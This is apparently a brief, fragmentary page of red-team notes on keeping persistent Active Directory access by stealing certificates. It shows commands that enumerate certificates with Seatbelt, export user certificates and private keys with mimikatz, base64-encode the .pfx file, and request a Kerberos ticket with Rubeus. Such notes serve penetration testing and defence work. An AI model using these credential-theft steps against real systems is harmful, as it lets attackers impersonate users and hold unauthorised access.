User & Computer Persistance
Certificates can also be useful for maintaining persistent access to both users and computers.
User Persistance
Enumerate certificates
Seatbelt.exe CertificatesMimikatz export
mimikatz crypto::certificates /exportdownload CURRENT_USER_My_0_Nina Lamb.pfxBase64 encode the pfx file
cat /mnt/c/Users/Attacker/Desktop/CURRENT_USER_My_0_Nina\ Lamb.pfx | base64 -w 0Rubeus to obtain a TGT
The export password will be mimikatz
If the user does not have a certificate in their store, we can just request one with Certify
Computer Persistance
Extract
/machine == auto elevate to SYSTEM
Last updated